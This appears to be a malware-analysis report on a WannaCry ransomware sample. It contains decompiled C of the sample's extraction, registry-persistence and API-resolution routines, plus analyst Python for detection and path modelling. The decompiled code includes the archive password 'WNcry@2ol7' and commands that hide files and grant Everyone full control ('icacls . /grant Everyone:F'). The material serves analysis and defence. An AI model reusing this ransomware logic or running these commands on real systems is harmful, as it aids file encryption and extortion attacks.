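"""
import re

# Names the decompiled code resolves at runtime, grouped by the DLL each
# GetProcAddress call targets in the listing.
RUNTIME_RESOLVED = {
    "advapi32.dll": {"CryptAcquireContextA", "CryptImportKey", "CryptDestroyKey",
                     "CryptEncrypt", "CryptDecrypt", "CryptGenKey"},
    "kernel32.dll": {"CreateFileW", "WriteFile", "ReadFile", "MoveFileW",
                     "MoveFileExW", "DeleteFileW", "CloseHandle"},
}


def ascii_strings(blob, min_len=5):
    """Printable ASCII runs, the same thing `strings` would print."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def resolver_profile(blob, static_imports):
    """For each watched DLL: is its name present as a string, and which
    watched APIs occur as strings without appearing in the import table."""
    present = set(ascii_strings(blob))
    lowered = {s.lower() for s in present}
    static = set(static_imports)
    profile = {}
    for dll, names in RUNTIME_RESOLVED.items():
        profile[dll] = {
            "dll_string": dll in lowered,
            "hidden_apis": sorted((names & present) - static),
        }
    return profile


def is_crypto_file_io_resolver(profile):
    """Flag the combination this sample shows: CryptoAPI names resolved from
    advapi32 plus several file APIs resolved from kernel32."""
    adv = profile["advapi32.dll"]
    k32 = profile["kernel32.dll"]
    return (adv["dll_string"] and len(adv["hidden_apis"]) >= 3
            and k32["dll_string"] and len(k32["hidden_apis"]) >= 3)


# Constructed .rdata-style excerpt: NUL-separated strings in the order the
# listing resolves them, plus unrelated format strings as noise.
SAMPLE_RDATA = b"\x00".join([
    b"advapi32.dll", b"CryptAcquireContextA", b"CryptImportKey", b"CryptDestroyKey",
    b"CryptEncrypt", b"CryptDecrypt", b"CryptGenKey",
    b"kernel32.dll", b"CreateFileW", b"WriteFile", b"ReadFile", b"MoveFileW",
    b"MoveFileExW", b"DeleteFileW", b"CloseHandle", b"%s%s%s", b"%s%s",
]) + b"\x00"

# Constructed import table. WriteFile and CloseHandle are also called directly
# in E00407136, so a name can be both imported and resolved at runtime.
SAMPLE_IMPORTS = ["LoadLibraryA", "GetProcAddress", "CreateFileA", "WriteFile",
                  "CloseHandle", "SetFileTime", "wsprintfA"]


if __name__ == "__main__":
    prof = resolver_profile(SAMPLE_RDATA, SAMPLE_IMPORTS)
    for dll, info in prof.items():
        print(dll, info)
    print("crypto + file I/O resolver:", is_crypto_file_io_resolver(prof))
```

The point of subtracting the static imports is visible in E00407136 below, which calls WriteFile and CloseHandle directly: a name that is both imported and resolved at runtime is not evidence of hiding, whereas the CryptoAPI names and the wide-character file APIs here appear only as strings.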
            0x00401713
            0x004017d8
            0x00000000
            0x004017d8
            0x0040171b
            0x00401721
            0x004017d3
            0x004017d5
            0x00000000
            0x004017d5
            0x00401732
            0x00401736
            0x00000000
            0x00000000
            0x00401751
            0x0040175e
            0x0040176b
            0x00401778
            0x00401785
            0x00401792
            0x00401797
            0x00401799
            0x0040179f
            0x004017a5
            0x00000000
            0x00000000
            0x004017a7
            0x004017ad
            0x00000000
            0x00000000
            0x004017af
            0x004017b5
            0x00000000
            0x00000000
            0x004017b7
            0x004017bd
            0x00000000
            0x00000000
            0x004017bf
            0x004017c5
            0x00000000
            0x00000000
            0x004017c7
            0x004017cd
            0x00000000
            0x00000000
            0x00000000
            0x00000000

            APIs
              • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
            • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
            • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
            • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: AddressProc$LibraryLoad
            • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
            • API String ID: 2238633743-1294736154
            • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
            • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
            • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
            • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
            				long _v8;
            				char _v267;
            				char _v268;
            				struct _FILETIME _v284;
            				struct _FILETIME _v292;
            				struct _FILETIME _v300;
            				long _v304;
            				char _v568;
            				char _v828;
            				intOrPtr _t78;
            				intOrPtr _t89;
            				intOrPtr _t91;
            				intOrPtr _t96;
            				intOrPtr _t97;
            				char _t100;
            				void* _t112;
            				void* _t113;
            				int _t124;
            				long _t131;
            				intOrPtr _t136;
            				char* _t137;
            				char* _t144;
            				void* _t148;
            				char* _t150;
            				void* _t154;
            				signed int _t155;
            				long _t156;
            				void* _t157;
            				char* _t158;
            				long _t159;
            				intOrPtr* _t161;
            				long _t162;
            				void* _t163;
            				void* _t164;
            
            				_t154 = __edx;
            				_t139 = __ecx;
            				_t136 = _a16;
            				_t161 = __ecx;
            				if(_t136 == 3) {
            					_t78 =  *((intOrPtr*)(__ecx + 4));
            					_t155 = _a4;
            					__eflags = _t155 - _t78;
            					if(_t155 == _t78) {
            						L14:
            						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
            						__eflags = _t156;
            						if(_t156 <= 0) {
            							E00406A97( *_t161);
            							_t14 = _t161 + 4;
            							 *_t14 =  *(_t161 + 4) | 0xffffffff;
            							__eflags =  *_t14;
            						}
            						__eflags = _a7;
            						if(_a7 == 0) {
            							__eflags = _t156;
            							if(_t156 <= 0) {
            								__eflags = _t156 - 0xffffff96;
            								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
            							}
            							return 0x600;
            						} else {
            							L17:
            							return 0;
            						}
            					}
            					__eflags = _t78 - 0xffffffff;
            					if(_t78 != 0xffffffff) {
            						E00406A97( *__ecx);
            						_pop(_t139);
            					}
            					_t89 =  *_t161;
            					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
            					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
            					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
            						L3:
            						return 0x10000;
            					} else {
            						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
            						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
            							L11:
            							_t91 =  *_t161;
            							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
            							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
            								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
            								 *(_t161 + 4) = _t155;
            								_pop(_t139);
            								goto L14;
            							}
            							E00406520(_t91);
            							L10:
            							goto L11;
            						}
            						E004064E2(_t139, _t89);
            						goto L10;
            					}
            				}
            				if(_t136 == 2 || _t136 == 1) {
            					__eflags =  *(_t161 + 4) - 0xffffffff;
            					if( *(_t161 + 4) != 0xffffffff) {
            						E00406A97( *_t161);
            						_pop(_t139);
            					}
            					_t96 =  *_t161;
            					_t157 = _a4;
            					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
            					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
            					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
            						goto L3;
            					} else {
            						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
            						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
            							L27:
            							_t97 =  *_t161;
            							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
            							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
            								E00406C40(_t161, _t154, _t157,  &_v568);
            								__eflags = _v304 & 0x00000010;
            								if((_v304 & 0x00000010) == 0) {
            									__eflags = _t136 - 1;
            									if(_t136 != 1) {
            										_t158 = _a8;
            										_t137 = _t158;
            										_t144 = _t158;
            										_t100 =  *_t158;
            										while(1) {
            											__eflags = _t100;
            											if(_t100 == 0) {
            												break;
            											}
            											__eflags = _t100 - 0x2f;
            											if(_t100 == 0x2f) {
            												L44:
            												_t137 =  &(_t144[1]);
            												L45:
            												_t100 = _t144[1];
            												_t144 =  &(_t144[1]);
            												continue;
            											}
            											__eflags = _t100 - 0x5c;
            											if(_t100 != 0x5c) {
            												goto L45;
            											}
            											goto L44;
            										}
            										strcpy( &_v268, _t158);
            										__eflags = _t137 - _t158;
            										if(_t137 != _t158) {
            											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
            											__eflags = _v268 - 0x2f;
            											if(_v268 == 0x2f) {
            												L56:
            												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
            												E00407070(0,  &_v268);
            												_t164 = _t164 + 0x18;
            												L49:
            												__eflags = 0;
            												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
            												L50:
            												__eflags = _t112 - 0xffffffff;
            												_a4 = _t112;
            												if(_t112 != 0xffffffff) {
            													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
            													__eflags =  *(_t161 + 0x13c);
            													_pop(_t148);
            													if( *(_t161 + 0x13c) == 0) {
            														L00407700();
            														_t148 = 0x4000;
            														 *(_t161 + 0x13c) = _t113;
            													}
            													_t60 =  &_a12;
            													 *_t60 = _a12 & 0x00000000;
            													__eflags =  *_t60;
            													while(1) {
            														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
            														_t164 = _t164 + 0x10;
            														__eflags = _t159 - 0xffffff96;
            														if(_t159 == 0xffffff96) {
            															break;
            														}
            														__eflags = _t159;
            														if(__eflags < 0) {
            															L68:
            															_a12 = 0x5000000;
            															L71:
            															__eflags = _a16 - 1;
            															if(_a16 != 1) {
            																CloseHandle(_a4);
            															}
            															E00406A97( *_t161);
            															return _a12;
            														}
            														if(__eflags <= 0) {
            															L64:
            															__eflags = _a11;
            															if(_a11 != 0) {
            																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
            																goto L71;
            															}
            															__eflags = _t159;
            															if(_t159 == 0) {
            																goto L68;
            															}
            															continue;
            														}
            														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
            														__eflags = _t124;
            														if(_t124 == 0) {
            															_a12 = 0x400;
            															goto L71;
            														}
            														goto L64;
            													}
            													_a12 = 0x1000;
            													goto L71;
            												}
            												return 0x200;
            											}
            											__eflags = _v268 - 0x5c;
            											if(_v268 == 0x5c) {
            												goto L56;
            											}
            											__eflags = _v268;
            											if(_v268 == 0) {
            												L48:
            												_t160 = _t161 + 0x140;
            												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
            												E00407070(_t160,  &_v268);
            												_t164 = _t164 + 0x1c;
            												goto L49;
            											}
            											__eflags = _v267 - 0x3a;
            											if(_v267 != 0x3a) {
            												goto L48;
            											}
            											goto L56;
            										}
            										_t37 =  &_v268;
            										 *_t37 = _v268 & 0x00000000;
            										__eflags =  *_t37;
            										goto L48;
            									}
            									_t112 = _a8;
            									goto L50;
            								}
            								__eflags = _t136 - 1;
            								if(_t136 == 1) {
            									goto L17;
            								}
            								_t150 = _a8;
            								_t131 =  *_t150;
            								__eflags = _t131 - 0x2f;
            								if(_t131 == 0x2f) {
            									L35:
            									_push(_t150);
            									_push(0);
            									L37:
            									E00407070();
            									goto L17;
            								}
            								__eflags = _t131 - 0x5c;
            								if(_t131 == 0x5c) {
            									goto L35;
            								}
            								__eflags = _t131;
            								if(_t131 == 0) {
            									L36:
            									_t162 = _t161 + 0x140;
            									__eflags = _t162;
            									_push(_t150);
            									_push(_t162);
            									goto L37;
            								}
            								__eflags = _t150[1] - 0x3a;
            								if(_t150[1] != 0x3a) {
            									goto L36;
            								}
            								goto L35;
            							}
            							E00406520(_t97);
            							L26:
            							goto L27;
            						}
            						E004064E2(_t139, _t96);
            						goto L26;
            					}
            				} else {
            					goto L3;
            				}
            			}
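E00407136 writes an archive member to disk: it reads 0x4000-byte chunks through E00406880 into the buffer kept at object+0x13c, writes them with WriteFile, and finishes with SetFileTime. The part an analyst needs when reconstructing where dropped files land is the destination-path selection. The routine copies the entry name into `_v268`, scans it for the last '/' or '\\' and cuts the copy there, leaving a directory part and a file part. If the directory part starts with a separator or has ':' as its second byte, the destination is wsprintfA("%s%s", dir, file), that is the entry's own path; otherwise it is wsprintfA("%s%s%s", base, dir, file) with the string at object+0x140 as the base. The following is an added illustration derived from reading the listing, not code from the sample; `base` is assumed to be that object+0x140 string, and the helper E00407070 called with the directory part is not modelled. It also adds the containment check an extractor would apply, which the listing does not perform.

```python
"""Output-path selection of the extraction routine E00407136 above.

Added illustration derived from reading the listing; not code from the sample.
`base` is assumed to be the string the object keeps at offset 0x140; the
helper E00407070 called with the directory part is not modelled here.
"""
import re


def split_entry_name(name):
    """Directory part (up to and including the last separator) and file part,
    the same cut the listing makes when it zero-terminates _v268 at _t137."""
    last = -1
    for i, ch in enumerate(name):
        if ch in "/\\":
            last = i
    if last < 0:
        return "", name
    return name[:last + 1], name[last + 1:]


def is_rooted(dir_part):
    """The listing's test on _v268/_v267: leading separator or drive colon."""
    return dir_part[:1] in ("/", "\\") or dir_part[1:2] == ":"


def output_path(base, name):
    """Where the routine would create the entry `name` relative to `base`."""
    d, f = split_entry_name(name)
    if d and is_rooted(d):
        return d + f          # "%s%s": entry path used as-is
    return base + d + f       # "%s%s%s": prefixed with the base directory


def escapes_base(name):
    """Analyst check the listing does not make: does the entry land outside
    the base? True for rooted names and for names whose '..' components
    climb above the base directory."""
    d, f = split_entry_name(name)
    if d and is_rooted(d):
        return True
    depth = 0
    for part in re.split(r"[\\/]+", d + f):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part not in ("", "."):
            depth += 1
    return False


def layout(base, names):
    """Map each entry to its destination and whether it escapes the base."""
    return {n: (output_path(base, n), escapes_base(n)) for n in names}


if __name__ == "__main__":
    # Constructed entry names; none are taken from the sample's archive.
    for entry, (dest, esc) in layout("C:\\base\\", [
            "a.bin", "sub\\a.bin", "\\Windows\\a.bin", "D:\\x\\a.bin", "..\\a.bin"]).items():
        print(f"{entry:20} -> {dest:28} escapes={esc}")
```

Note that a name with no separator at all always takes the prefixed form, because the listing clears `_v268` before the checks in that case; only names that contain a separator can be treated as rooted. For directory entries (attribute 0x10 set) the listing applies the same leading-separator and drive-colon test to the raw name before calling E00407070.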
            0x00407136
            0x00407136
            0x00407140
            0x00407148
            0x0040714a
            0x00407168
            0x0040716b
            0x0040716e
            0x00407170
            0x004071b7
            0x004071c8
            0x004071cd
            0x004071cf
            0x004071d3
            0x004071d8
            0x004071d8
            0x004071d8
            0x004071dc
            0x004071dd
            0x004071e1
            0x004071ea
            0x004071ec
            0x004071fa
            0x00000000
            0x00407206
            0x00000000
            0x004071e3
            0x004071e3
            0x00000000
            0x004071e3
            0x004071e1
            0x00407172
            0x00407175
            0x00407179
            0x0040717e
            0x0040717e
            0x0040717f
            0x00407181
            0x00407185
            0x00407188
            0x0040715e
            0x00000000
            0x0040718a
            0x0040718a
            0x0040718d
            0x00407196
            0x00407196
            0x00407198
            0x0040719b
            0x004071ad
            0x004071b3
            0x004071b6
            0x00000000
            0x004071b6
            0x0040719e
            0x00407195
            0x00000000
            0x00407195
            0x00407190
            0x00000000
            0x00407190
            0x00407188
            0x0040714f
            0x00407210
            0x00407214
            0x00407218
            0x0040721d
            0x0040721d
            0x0040721e
            0x00407220
            0x00407223
            0x00407227
            0x0040722a
            0x00000000
            0x00407230
            0x00407230
            0x00407233
            0x0040723c
            0x0040723c
            0x0040723e
            0x00407241
            0x00407255
            0x0040725a
            0x00407261
            0x0040729c
            0x0040729f
            0x004072a9
            0x004072ac
            0x004072ae
            0x004072b0
            0x004072b2
            0x004072b2
            0x004072b4
            0x00000000
            0x00000000
            0x004072b6
            0x004072b8
            0x004072be
            0x004072be
            0x004072c1
            0x004072c1
            0x004072c4
            0x00000000
            0x004072c4
            0x004072ba
            0x004072bc
            0x00000000
            0x00000000
            0x00000000
            0x004072bc
            0x004072cf
            0x004072d5
            0x004072d8
            0x00407347
            0x0040734f
            0x00407356
            0x0040737b
            0x0040738f
            0x0040739e
            0x004073a3
            0x00407312
            0x00407312
            0x0040732b
            0x00407331
            0x00407331
            0x00407334
            0x00407337
            0x004073b3
            0x004073b8
            0x004073c0
            0x004073c6
            0x004073c9
            0x004073ce
            0x004073cf
            0x004073cf
            0x004073d5
            0x004073d5
            0x004073d5
            0x004073d9
            0x004073eb
            0x004073ed
            0x004073f0
            0x004073f3
            0x00000000
            0x00000000
            0x004073f5
            0x004073f7
            0x0040742a
            0x0040742a
            0x0040745a
            0x0040745a
            0x0040745e
            0x00407463
            0x00407463
            0x0040746b
            0x00000000
            0x00407473
            0x004073f9
            0x00407415
            0x00407415
            0x00407419
            0x00407454
            0x00000000
            0x00407454
            0x0040741b
            0x0040741d
            0x00000000
            0x00000000
            0x00000000
            0x0040741f
            0x0040740b
            0x00407411
            0x00407413
            0x00407433
            0x00000000
            0x00407433
            0x00000000
            0x00407413
            0x00407421
            0x00000000
            0x00407421
            0x00000000
            0x00407339
            0x00407358
            0x0040735f
            0x00000000
            0x00000000
            0x00407361
            0x00407368
            0x004072e1
            0x004072e7
            0x004072fc
            0x0040730a
            0x0040730f
            0x00000000
            0x0040730f
            0x0040736e
            0x00407375
            0x00000000
            0x00000000
            0x00000000
            0x00407375
            0x004072da
            0x004072da
            0x004072da
            0x00000000
            0x004072da
            0x004072a1
            0x00000000
            0x004072a1
            0x00407263
            0x00407266
            0x00000000
            0x00000000
            0x0040726c
            0x0040726f
            0x00407271
            0x00407273
            0x00407283
            0x00407283
            0x00407284
            0x00407290
            0x00407290
            0x00000000
            0x00407296
            0x00407275
            0x00407277
            0x00000000
            0x00000000
            0x00407279
            0x0040727b
            0x00407288
            0x00407288
            0x00407288
            0x0040728e
            0x0040728f
            0x00000000
            0x0040728f
            0x0040727d
            0x00407281
            0x00000000
            0x00000000
            0x00000000
            0x00407281
            0x00407244
            0x0040723b
            0x00000000
            0x0040723b
            0x00407236
            0x00000000
            0x00407236
            0x00000000
            0x00000000
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID:
            • String ID: %s%s$%s%s%s$:$\
            • API String ID: 0-1100577047
            • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
            • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
            • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
            • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E0040203B(intOrPtr* __eax, void* __edi) {
            				void* _t25;
            				intOrPtr* _t33;
            				int _t42;
            				CHAR* _t63;
            				void* _t64;
            				char** _t66;
            
            				__imp____p___argv();
            				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
            					L4:
            					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
            						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
            					}
            					SetCurrentDirectoryA(_t64 - 0x20c);
            					E004010FD(1);
            					 *_t66 = "WNcry@2ol7";
            					_push(_t42);
            					L00401DAB();
            					E00401E9E();
            					E00401064("attrib +h .", _t42, _t42);
            					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
            					_t25 = E0040170A();
            					_t74 = _t25;
            					if(_t25 != 0) {
            						E004012FD(_t64 - 0x6e4, _t74);
            						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
            							 *(_t64 - 4) = _t42;
            							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
            								_t33 = E00402924(_t32, "TaskStart");
            								_t78 = _t33 - _t42;
            								if(_t33 != _t42) {
            									 *_t33(_t42, _t42);
            								}
            							}
            						}
            						E0040137A(_t64 - 0x6e4, _t78);
            					}
            					goto L13;
            				} else {
            					_t63 = "tasksche.exe";
            					CopyFileA(_t64 - 0x20c, _t63, _t42);
            					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
            						goto L4;
            					} else {
            						L13:
            						return 0;
            					}
            				}
            			}

            APIs
            • __p___argv.MSVCRT(0040F538), ref: 00402040
            • strcmp.MSVCRT(?), ref: 0040204B
            • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
            • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
              • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
            • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
            • strrchr.MSVCRT(?,0000005C), ref: 004020AE
            • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
              • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
              • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
              • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
              • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
            • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
            • API String ID: 1074704982-2844324180
            • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
            • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
            • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
            • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E004010FD(intOrPtr _a4) {
            				signed int _v8;
            				signed int _v12;
            				int _v16;
            				void _v196;
            				long _v216;
            				void _v735;
            				char _v736;
            				signed int _t44;
            				void* _t46;
            				signed int _t55;
            				signed int _t56;
            				char* _t72;
            				void* _t77;
            
            				_t56 = 5;
            				memcpy( &_v216, L"Software\\", _t56 << 2);
            				_push(0x2d);
            				_v736 = _v736 & 0;
            				_v8 = _v8 & 0x00000000;
            				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
            				asm("stosw");
            				asm("stosb");
            				wcscat( &_v216, L"WanaCrypt0r");
            				_v12 = _v12 & 0x00000000;
            				_t72 = "wd";
            				do {
            					_push( &_v8);
            					_push( &_v216);
            					if(_v12 != 0) {
            						_push(0x80000001);
            					} else {
            						_push(0x80000002);
            					}
            					RegCreateKeyW();
            					if(_v8 != 0) {
            						if(_a4 == 0) {
            							_v16 = 0x207;
            							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
            							asm("sbb esi, esi");
            							_t77 =  ~_t44 + 1;
            							if(_t77 != 0) {
            								SetCurrentDirectoryA( &_v736);
            							}
            						} else {
            							GetCurrentDirectoryA(0x207,  &_v736);
            							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
            							asm("sbb esi, esi");
            							_t77 =  ~_t55 + 1;
            						}
            						RegCloseKey(_v8);
            						if(_t77 != 0) {
            							_t46 = 1;
            							return _t46;
            						} else {
            							goto L10;
            						}
            					}
            					L10:
            					_v12 = _v12 + 1;
            				} while (_v12 < 2);
            				return 0;
            			}

            APIs
            • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
            • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
            • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
            • strlen.MSVCRT(?), ref: 004011A7
            • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
            • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
            • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
            • RegCloseKey.ADVAPI32(00000000), ref: 00401203
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
            • String ID: 0@$Software\$WanaCrypt0r
            • API String ID: 865909632-3421300005
            • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
            • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
            • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
            • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E00401B5F(intOrPtr _a4) {
            				void _v202;
            				short _v204;
            				void _v722;
            				long _v724;
            				signed short _v1240;
            				void _v1242;
            				long _v1244;
            				void* _t55;
            				signed int _t65;
            				void* _t72;
            				long _t83;
            				void* _t94;
            				void* _t98;
            
            				_t83 =  *0x40f874; // 0x0
            				_v1244 = _t83;
            				memset( &_v1242, 0, 0x81 << 2);
            				asm("stosw");
            				_v724 = _t83;
            				memset( &_v722, 0, 0x81 << 2);
            				asm("stosw");
            				_push(0x31);
            				_v204 = _t83;
            				memset( &_v202, 0, 0 << 2);
            				asm("stosw");
            				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
            				GetWindowsDirectoryW( &_v1244, 0x104);
            				_v1240 = _v1240 & 0x00000000;
            				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
            				_t98 = _t94 + 0x30;
            				if(GetFileAttributesW( &_v724) == 0xffffffff) {
            					L3:
            					swprintf( &_v724, L"%s\\Intel",  &_v1244);
